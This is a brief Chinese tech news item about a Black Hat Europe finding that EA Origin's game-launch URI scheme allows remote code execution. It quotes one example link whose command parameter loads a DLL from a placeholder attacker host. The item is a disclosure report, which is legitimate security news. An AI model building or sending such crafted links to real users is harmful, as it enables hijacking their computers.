solidot | ea origin平台漏洞允许攻击者劫持玩家电脑

在black hat europe大会上，安全研究人员发现了一个影响4千万origin玩家的漏洞，该漏洞允许攻击者在玩家电脑上远程执行恶意代码。问题与ea origin在玩家电脑上启动游戏的统一资源标识符有关。研究人员演示了如何控制一台安装 crysis 3和origin客户端的电脑：通常origin是使用origin://launchgame/71503链接启动游戏，但如果目标用户点击了链接origin://launchgame/71503?commandparams= -openautomate \\attacker_ip\evil.dll，origin将会载入攻击者选择的windows动态链接库文件。这个漏洞与去年发现的steam漏洞相似（也是与steam:// url有关）。